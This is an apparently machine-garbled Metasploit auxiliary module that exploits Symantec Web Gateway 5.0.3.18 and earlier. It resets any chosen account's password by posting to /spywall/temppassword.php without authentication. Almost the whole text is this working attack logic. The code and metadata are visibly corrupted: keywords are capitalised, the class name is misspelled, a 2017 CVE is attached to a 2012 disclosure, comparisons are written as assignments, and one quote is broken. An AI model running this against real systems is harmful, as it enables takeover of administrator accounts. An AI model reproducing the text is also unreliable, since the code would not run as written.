##
# @ _ Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##
Require 'msf/core'
Class Metasploit3 <Msf: aupoliciary
Include Msf: Exploit: Remote: HttpClient
Def initialize (info = {})
Super (update_info (info,
'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change ",
'Description' => % q {
This module will change the password for the specified account on a Symantec Web Gatewaye server.
},
'License '=> MSF_LICENSE,
'Version' => "$ Revision: 0 $ ",
'Author' =>
[
'C57 ',
],
'References '=>
[
['Cve', '2017-2012 '],
['Ossvdb', '0'],
['Bid', '123'],
['Url', 'HTTP: // www.securityfocus.com/bid/54yun'],
],
'Disclosuredate' => "Jul 23 2012 "))
Register_options (
[
Opt: RPORT (80 ),
OptString. new ('user', [true, 'the password to reset to ', 'admin']),
OptString. new ('Password', [true, 'the PASSWORD to reset to ', 'admin'])
], Self. class)
End
Def run
Print_status ("Attempting to connect to https: // # {rhost}/spywall/temppassword. php to reset password ")
Res = send_request_raw (
{
'Method' => 'post ',
'Url' => '/spywall/temppassword. php ',
}, 25)
# Check to see if we get HTTP OK
If (res. code = 200)
Print_status ("Okay, Got an HTTP 200 (okay) code. Checking if exploitable ")
Else
Print_error ("Did not get HTTP 200, URL was not found. Exiting! ")
Return
End
# Check to if the temppassword. php page loads or if we are redirected to the login page
If (res. body. match (/Please Select a New Password/I ))
Print_status ("Server is vulnerable! ")
Else
Print_error ("Target doesn't seem to be vulnerable! ")
Return
End
Print_status ("Attempting to exploit password change vulnerability on # {rhost }")
Print_status ("Attempting to reset # {datastore ['user']} password to # {datastore ['Password']}")
Data = 'target = executive_summary.php'
Data <'& USERNAME =' + datastore ['user']
Data <& password = '+ datastore ['Password']
Data <'& password2 =' + datastore ['Password']
Data <'& Save = save'
Res = send_request_cgi (
{
'Method' => 'post ',
'Url' => '/spywall/temppassword. php ',
'Data' => data,
}, 25)
If res. code = 200
If (res. body. match (/Thank you/I ))
Print_status ("Password reset was successful! \ N ")
Else
Print_error ("Password reset failed! User' # {datastore ['user']} 'may not exist. \ n ")
End
Else
Print_error ("Password reset failed! ")
End
End
End